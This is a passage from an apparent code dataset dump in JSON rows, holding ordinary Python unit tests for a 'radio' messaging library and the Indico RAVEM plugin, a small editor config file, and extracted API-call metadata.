'(self._sources[source])\\n', (5998, 6021), False, 'import gobject\\n'), ((9243, 9287), 'gobject.source_remove', 'gobject.source_remove', (['self.doIterationTimer'], {}), '(self.doIterationTimer)\\n', (9264, 9287), False, 'import gobject\\n'), ((11173, 11208), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\\n', (11194, 11208), False, 'import gobject\\n'), ((12192, 12202), 'gtk.main', 'gtk.main', ([], {}), '()\\n', (12200, 12202), False, 'import gtk\\n'), ((12229, 12243), 'gtk.mainloop', 'gtk.mainloop', ([], {}), '()\\n', (12241, 12243), False, 'import gtk\\n'), ((12398, 12433), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\\n', (12419, 12433), False, 'import gobject\\n'), ((4403, 4445), 'signal.siginterrupt', 'signal.siginterrupt', (['signal.SIGCHLD', '(False)'], {}), '(signal.SIGCHLD, False)\\n', (4422, 4445), False, 'import sys, signal\\n'), ((9743, 9765), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ([], {}), '()\\n', (9763, 9765), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((9814, 9836), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ([], {}), '()\\n', (9834, 9836), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((11849, 11864), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\\n', (11862, 11864), False, 'import gtk\\n'), ((11899, 11913), 'gtk.mainquit', 'gtk.mainquit', ([], {}), '()\\n', (11911, 11913), False, 'import gtk\\n'), ((10665, 10696), 'twisted.python.log.msg', 'log.msg', ([\"('Error In %s' % source)\"], {}), \"('Error In %s' % source)\\n\", (10672, 10696), False, 'from twisted.python import log, runtime, failure\\n'), ((10713, 10725), 'twisted.python.log.deferr', 'log.deferr', ([], {}), '()\\n', (10723, 10725), False, 'from twisted.python import log, runtime, failure\\n'), ((10631, 10645), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\\n', (10643, 10645), False, 'import sys, signal\\n')]"}}},{"rowIdx":728,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase, TestLoader\n\nfrom radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound,\n HandlerAlreadyBound)\n\n\ndef init_radio(f):\n\n def wrap(self, *args):\n self.radio = Radio()\n return f(self, *args)\n\n return wrap\n\n\nclass TestRadioRequestReplyMethods(TestCase):\n\n @init_radio\n def test_request_reply_stop_replying(self):\n '''\n \"request\", \"reply\" and \"stopReplying\" methods work correctly.\n '''\n\n def foo_handler(): return 'foo'\n def bar_handler(my_arg=222): return my_arg\n\n self.radio.reply('foo', foo_handler)\n self.radio.reply('bar', bar_handler)\n self.assertEqual(self.radio.request('foo'), 'foo')\n self.assertEqual(self.radio.request('bar'), 222)\n self.assertEqual(self.radio.request('bar', 333), 333)\n self.assertEqual(self.radio.request('bar', my_arg=444), 444)\n self.radio.stopReplying('foo')\n self.radio.stopReplying('bar')\n\n with self.assertRaises(ListenerNotFound):\n self.radio.request('foo')\n with self.assertRaises(ListenerNotFound):\n self.radio.request('bar')\n\n @init_radio\n def test_kwargs(self):\n '''\n Keyword arguments works correctly.\n '''\n\n foo_list = []\n def foo_handler(foo, bar): return (foo, bar)\n self.radio.reply('foo', foo_handler)\n self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5))\n\n @init_radio\n def test_on_already_bound(self):\n '''\n \"reply\" fails when trying to bound handler that is already bounded.\n '''\n\n def foo_handler(): pass\n self.radio.reply('foo', foo_handler)\n self.radio.reply('bar', foo_handler)\n\n # General exception\n with self.assertRaises(HandlerAlreadyBound):\n self.radio.reply('foo', foo_handler)\n # Child exception\n with self.assertRaises(ReplyHandlerAlreadyBound):\n self.radio.reply('foo', foo_handler)\n\n @init_radio\n def test_off_handler_that_was_not_bounded(self):\n '''\n \"stopReplying\" fails when trying to unbound handler that was not\n bounded.\n '''\n\n def foo_handler(): pass\n\n with self.assertRaises(ListenerNotFound):\n self.radio.stopReplying('foo', foo_handler)\n\n @init_radio\n def test_off_soft_mode(self):\n '''\n \"stopReplying\" will not fail if safe-argument is set to True.\n '''\n\n def foo_handler(): pass\n self.radio.stopReplying('foo', foo_handler, soft=True)\n self.radio.stopReplying('foo', foo_handler, soft=True)\n\n @init_radio\n def test_trigger_fail_on_incorrect_arguments(self):\n '''\n \"request\" fails when arguments for handler is incorrect.\n '''\n\n def foo_handler(required_arg): pass\n self.radio.reply('foo', foo_handler)\n\n with self.assertRaises(TypeError):\n self.radio.request('foo')\n\n\nsuite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)\n"},"apis":{"kind":"list like","value":["radio.Radio","unittest.TestLoader"],"string":"[\n \"radio.Radio\",\n \"unittest.TestLoader\"\n]"},"extract_api":{"kind":"string","value":"[((248, 255), 'radio.Radio', 'Radio', ([], {}), '()\\n', (253, 255), False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\\n'), ((3016, 3028), 'unittest.TestLoader', 'TestLoader', ([], {}), '()\\n', (3026, 3028), False, 'from unittest import TestCase, TestLoader\\n')]"}}},{"rowIdx":729,"cells":{"code":{"kind":"string","value":"import os\nimport sys\n\nDIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )\n\n\ndef Settings( **kwargs ):\n return {\n 'interpreter_path': sys.executable,\n 'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ]\n }\n"},"apis":{"kind":"list like","value":["os.path.dirname","os.path.join"],"string":"[\n \"os.path.dirname\",\n \"os.path.join\"\n]"},"extract_api":{"kind":"string","value":"[((60, 85), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\\n', (75, 85), False, 'import os\\n'), ((187, 234), 'os.path.join', 'os.path.join', (['DIR_OF_THIS_SCRIPT', '\"\"\"third_party\"\"\"'], {}), \"(DIR_OF_THIS_SCRIPT, 'third_party')\\n\", (199, 234), False, 'import os\\n')]"}}},{"rowIdx":730,"cells":{"code":{"kind":"string","value":"# This file is part of the CERN Indico plugins.\n# Copyright (C) 2014 - 2022 CERN\n#\n# The CERN Indico plugins are free software; you can redistribute\n# them and/or modify them under the terms of the MIT License; see\n# the LICENSE file for more details.\n\nfrom unittest.mock import MagicMock\n\nimport pytest\nfrom requests.exceptions import HTTPError, Timeout\n\nfrom indico.testing.util import extract_logs\n\nfrom indico_ravem.plugin import RavemPlugin\nfrom indico_ravem.util import has_access, ravem_api_call\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize('method', ('get', 'post'))\ndef test_correct_http_method(mocker, method):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert request.call_args[0][0] == method\n\n\n@pytest.mark.usefixtures('db')\ndef test_correct_auth_method(mocker):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n token = 'foo'\n RavemPlugin.settings.set('access_token', token)\n ravem_api_call('test_endpoint', param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert 'Authorization' in request.call_args[1]['headers']\n assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token\n\n\n@pytest.mark.usefixtures('db')\ndef test_accepts_json(mocker):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n ravem_api_call('test_endpoint', param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert request.call_args[1]['headers']['Accept'] == 'application/json'\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), (\n ('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'),\n ('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'),\n ('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),\n ('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'),\n ('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'),\n ('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),\n ('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),\n ('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),\n ('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),\n ('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),\n ('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),\n ('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),\n ('https://ravem.test/', '', 'https://ravem.test/'),\n ('https://ravem.test/api/', '', 'https://ravem.test/api/'),\n ('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'),\n))\ndef test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n RavemPlugin.settings.set('api_endpoint', root_endpoint)\n ravem_api_call(endpoint, param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert request.call_args[0][1] == expected_url\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize('params', (\n {},\n {'p1': '1stparam'},\n {'p1': '1stparam', 'p2': '2ndparam'}\n))\ndef test_params_generated(mocker, params):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n ravem_api_call('test_endpoint', params=params)\n\n assert request.call_count == 1\n assert request.call_args[1]['params'] == params\n\n\n@pytest.mark.usefixtures('db')\ndef test_raises_timeout(mocker):\n request = mocker.patch('indico_ravem.util.requests.request')\n request.side_effect = Timeout('Timeout test error message', request=request)\n\n with pytest.raises(Timeout) as excinfo:\n ravem_api_call('test_endpoint')\n\n assert str(excinfo.value) == \"Timeout while contacting the room.\"\n assert request.call_count == 1\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize(('method', 'params'), (\n ('get', {}),\n ('post', {}),\n ('get', {'p1': '1stparam'}),\n ('post', {'p1': '1stparam'}),\n ('get', {'p1': '1stparam', 'p2': '2ndparam'}),\n ('post', {'p1': '1stparam', 'p2': '2ndparam'})\n))\ndef test_unexpected_exception_is_logged(mocker, caplog, method, params):\n request = mocker.patch('indico_ravem.util.requests.request')\n request.side_effect = IndexError('this is unexpected')\n\n with pytest.raises(IndexError) as excinfo:\n ravem_api_call('test_endpoint', method=method, **params)\n\n assert str(excinfo.value) == 'this is unexpected'\n log = extract_logs(caplog, one=True, name='indico.plugin.ravem')\n assert log.message == \"failed call: {} {} with {}: {}\".format(method.upper(), 'test_endpoint', params,\n 'this is unexpected')\n assert request.call_count == 1\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize(('method', 'params'), (\n ('get', {}),\n ('post', {}),\n ('get', {'p1': '1stparam'}),\n ('post', {'p1': '1stparam'}),\n ('get', {'p1': '1stparam', 'p2': '2ndparam'}),\n ('post', {'p1': '1stparam', 'p2': '2ndparam'})\n))\ndef test_http_error_is_logged(mocker, caplog, method, params):\n request = mocker.patch('indico_ravem.util.requests.request')\n request.method = method.upper()\n request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint'\n response = MagicMock()\n response.raise_for_status.side_effect = HTTPError('Well this is embarrassing')\n response.request = request\n response.url = response.request.url\n request.return_value = response\n\n with pytest.raises(HTTPError) as excinfo:\n ravem_api_call('test_endpoint', method=method, **params)\n\n assert str(excinfo.value) == 'Well this is embarrassing'\n log = extract_logs(caplog, one=True, name='indico.plugin.ravem')\n assert log.message == '{} {} failed with {}'.format(\n method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing')\n\n assert request.call_count == 1\n\n\n@pytest.mark.usefixtures('db')\ndef test_unlinked_event_vc_room_has_no_access():\n event_vc_room = MagicMock()\n event_vc_room.link_object = None\n\n assert not has_access(event_vc_room)\n\n\n@pytest.mark.usefixtures('db', 'request_context')\ndef test_unlinked_room_has_no_access(mocker):\n session = mocker.patch('indico_ravem.util.session')\n session.user = ''\n\n event_vc_room = MagicMock()\n event_vc_room.link_object.room = None\n\n assert not has_access(event_vc_room)\n\n\n@pytest.mark.usefixtures('db', 'request_context')\ndef test_check_if_current_user_is_room_owner(mocker):\n session = mocker.patch('indico_ravem.util.session')\n session.user = ''\n request = mocker.patch('indico_ravem.util.request')\n request.remote_addr = '192.168.127.12'\n retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal')\n retrieve_principal.side_effect = lambda x: session.user\n\n event_vc_room = MagicMock()\n event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)\n event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr\n event_vc_room.vc_room.data.get.return_value = 'User:123'\n event_vc_room.event.can_manage.return_value = False\n\n assert has_access(event_vc_room)\n\n\n@pytest.mark.usefixtures('db', 'request_context')\ndef test_check_if_current_user_can_modify(mocker):\n request = mocker.patch('indico_ravem.util.request')\n request.remote_addr = '192.168.127.12'\n session = mocker.patch('indico_ravem.util.session')\n session.user = ''\n mocker.patch('indico_ravem.util._retrieve_principal')\n\n event_vc_room = MagicMock()\n event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)\n event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr\n event_vc_room.event.can_manage.return_value = True\n\n assert has_access(event_vc_room)\n event_vc_room.event.can_manage.assert_called_once_with(session.user)\n"},"apis":{"kind":"list like","value":["unittest.mock.MagicMock","indico.testing.util.extract_logs","indico_ravem.plugin.RavemPlugin.settings.get","indico_ravem.util.has_access","pytest.mark.parametrize","pytest.raises","pytest.mark.usefixtures","requests.exceptions.HTTPError","indico_ravem.plugin.RavemPlugin.settings.set","indico_ravem.util.ravem_api_call","requests.exceptions.Timeout"],"string":"[\n \"unittest.mock.MagicMock\",\n \"indico.testing.util.extract_logs\",\n \"indico_ravem.plugin.RavemPlugin.settings.get\",\n \"indico_ravem.util.has_access\",\n \"pytest.mark.parametrize\",\n \"pytest.raises\",\n \"pytest.mark.usefixtures\",\n \"requests.exceptions.HTTPError\",\n \"indico_ravem.plugin.RavemPlugin.settings.set\",\n \"indico_ravem.util.ravem_api_call\",\n \"requests.exceptions.Timeout\"\n]"},"extract_api":{"kind":"string","value":"[((506, 535), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (529, 535), False, 'import pytest\\n'), ((537, 587), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['\"\"\"method\"\"\"', \"('get', 'post')\"], {}), \"('method', ('get', 'post'))\\n\", (560, 587), False, 'import pytest\\n'), ((1033, 1062), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (1056, 1062), False, 'import pytest\\n'), ((1655, 1684), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (1678, 1684), False, 'import pytest\\n'), ((2130, 2159), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (2153, 2159), False, 'import pytest\\n'), ((2161, 3611), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ([\"('root_endpoint', 'endpoint', 'expected_url')\", \"(('https://ravem.test/', 'final_endpoint',\\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'final_endpoint',\\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\\n 'https://ravem.test/api/', './final_endpoint',\\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\\n 'https://ravem.test', 'sub/final_endpoint',\\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\\n 'https://ravem.test/api/', './sub/final_endpoint',\\n 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\\n 'https://ravem.test/api/v2/'))\"], {}), \"(('root_endpoint', 'endpoint', 'expected_url'), ((\\n 'https://ravem.test/', 'final_endpoint',\\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'final_endpoint',\\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\\n 'https://ravem.test/api/', './final_endpoint',\\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\\n 'https://ravem.test', 'sub/final_endpoint',\\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\\n 'https://ravem.test/api/', './sub/final_endpoint',\\n 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\\n 'https://ravem.test/api/v2/')))\\n\", (2184, 3611), False, 'import pytest\\n'), ((4101, 4130), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (4124, 4130), False, 'import pytest\\n'), ((4132, 4233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['\"\"\"params\"\"\"', \"({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})\"], {}), \"('params', ({}, {'p1': '1stparam'}, {'p1':\\n '1stparam', 'p2': '2ndparam'}))\\n\", (4155, 4233), False, 'import pytest\\n'), ((4661, 4690), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (4684, 4690), False, 'import pytest\\n'), ((5064, 5093), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (5087, 5093), False, 'import pytest\\n'), ((5095, 5336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ([\"('method', 'params')\", \"(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\\n 'p1': '1stparam', 'p2': '2ndparam'}))\"], {}), \"(('method', 'params'), (('get', {}), ('post', {}), (\\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\\n '2ndparam'})))\\n\", (5118, 5336), False, 'import pytest\\n'), ((6017, 6046), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (6040, 6046), False, 'import pytest\\n'), ((6048, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ([\"('method', 'params')\", \"(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\\n 'p1': '1stparam', 'p2': '2ndparam'}))\"], {}), \"(('method', 'params'), (('get', {}), ('post', {}), (\\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\\n '2ndparam'})))\\n\", (6071, 6289), False, 'import pytest\\n'), ((7213, 7242), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (7236, 7242), False, 'import pytest\\n'), ((7406, 7454), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"', '\"\"\"request_context\"\"\"'], {}), \"('db', 'request_context')\\n\", (7429, 7454), False, 'import pytest\\n'), ((7705, 7753), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"', '\"\"\"request_context\"\"\"'], {}), \"('db', 'request_context')\\n\", (7728, 7753), False, 'import pytest\\n'), ((8491, 8539), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"', '\"\"\"request_context\"\"\"'], {}), \"('db', 'request_context')\\n\", (8514, 8539), False, 'import pytest\\n'), ((714, 725), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (723, 725), False, 'from unittest.mock import MagicMock\\n'), ((870, 948), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'method': 'method', 'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"('test_endpoint', method=method, param1='test1', param2='test2')\\n\", (884, 948), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((1181, 1192), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (1190, 1192), False, 'from unittest.mock import MagicMock\\n'), ((1355, 1402), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['\"\"\"access_token\"\"\"', 'token'], {}), \"('access_token', token)\\n\", (1379, 1402), False, 'from indico_ravem.plugin import RavemPlugin\\n'), ((1407, 1470), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"('test_endpoint', param1='test1', param2='test2')\\n\", (1421, 1470), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((1796, 1807), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (1805, 1807), False, 'from unittest.mock import MagicMock\\n'), ((1952, 2015), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"('test_endpoint', param1='test1', param2='test2')\\n\", (1966, 2015), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((3738, 3749), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (3747, 3749), False, 'from unittest.mock import MagicMock\\n'), ((3894, 3949), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['\"\"\"api_endpoint\"\"\"', 'root_endpoint'], {}), \"('api_endpoint', root_endpoint)\\n\", (3918, 3949), False, 'from indico_ravem.plugin import RavemPlugin\\n'), ((3954, 4010), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['endpoint'], {'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"(endpoint, param1='test1', param2='test2')\\n\", (3968, 4010), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((4367, 4378), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (4376, 4378), False, 'from unittest.mock import MagicMock\\n'), ((4523, 4569), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'params': 'params'}), \"('test_endpoint', params=params)\\n\", (4537, 4569), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((4815, 4869), 'requests.exceptions.Timeout', 'Timeout', (['\"\"\"Timeout test error message\"\"\"'], {'request': 'request'}), \"('Timeout test error message', request=request)\\n\", (4822, 4869), False, 'from requests.exceptions import HTTPError, Timeout\\n'), ((5725, 5783), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '\"\"\"indico.plugin.ravem\"\"\"'}), \"(caplog, one=True, name='indico.plugin.ravem')\\n\", (5737, 5783), False, 'from indico.testing.util import extract_logs\\n'), ((6559, 6570), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (6568, 6570), False, 'from unittest.mock import MagicMock\\n'), ((6615, 6653), 'requests.exceptions.HTTPError', 'HTTPError', (['\"\"\"Well this is embarrassing\"\"\"'], {}), \"('Well this is embarrassing')\\n\", (6624, 6653), False, 'from requests.exceptions import HTTPError, Timeout\\n'), ((6945, 7003), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '\"\"\"indico.plugin.ravem\"\"\"'}), \"(caplog, one=True, name='indico.plugin.ravem')\\n\", (6957, 7003), False, 'from indico.testing.util import extract_logs\\n'), ((7312, 7323), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (7321, 7323), False, 'from unittest.mock import MagicMock\\n'), ((7606, 7617), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (7615, 7617), False, 'from unittest.mock import MagicMock\\n'), ((8151, 8162), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (8160, 8162), False, 'from unittest.mock import MagicMock\\n'), ((8214, 8242), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\\n', (8223, 8242), False, 'from unittest.mock import MagicMock\\n'), ((8462, 8487), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (8472, 8487), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((8853, 8864), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (8862, 8864), False, 'from unittest.mock import MagicMock\\n'), ((8916, 8944), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\\n', (8925, 8944), False, 'from unittest.mock import MagicMock\\n'), ((9102, 9127), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (9112, 9127), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((4880, 4902), 'pytest.raises', 'pytest.raises', (['Timeout'], {}), '(Timeout)\\n', (4893, 4902), False, 'import pytest\\n'), ((4923, 4954), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {}), \"('test_endpoint')\\n\", (4937, 4954), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((5557, 5582), 'pytest.raises', 'pytest.raises', (['IndexError'], {}), '(IndexError)\\n', (5570, 5582), False, 'import pytest\\n'), ((5603, 5659), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'method': 'method'}), \"('test_endpoint', method=method, **params)\\n\", (5617, 5659), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((6485, 6525), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['\"\"\"api_endpoint\"\"\"'], {}), \"('api_endpoint')\\n\", (6509, 6525), False, 'from indico_ravem.plugin import RavemPlugin\\n'), ((6771, 6795), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\\n', (6784, 6795), False, 'import pytest\\n'), ((6816, 6872), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'method': 'method'}), \"('test_endpoint', method=method, **params)\\n\", (6830, 6872), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((7377, 7402), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (7387, 7402), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((7676, 7701), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (7686, 7701), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((7085, 7125), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['\"\"\"api_endpoint\"\"\"'], {}), \"('api_endpoint')\\n\", (7109, 7125), False, 'from indico_ravem.plugin import RavemPlugin\\n')]"}}},{"rowIdx":731,"cells":{"code":{"kind":"string","value":"import numpy as np\nimport xml.etree.ElementTree as ET\n\nclass Geom(object):\n def __init__(self, geom):\n self.xml = geom\n self.params = []\n\n def get_params(self):\n return self.params.copy()\n\n def set_params(self, new_params):\n self.params = new_params\n\n def update_point(self, 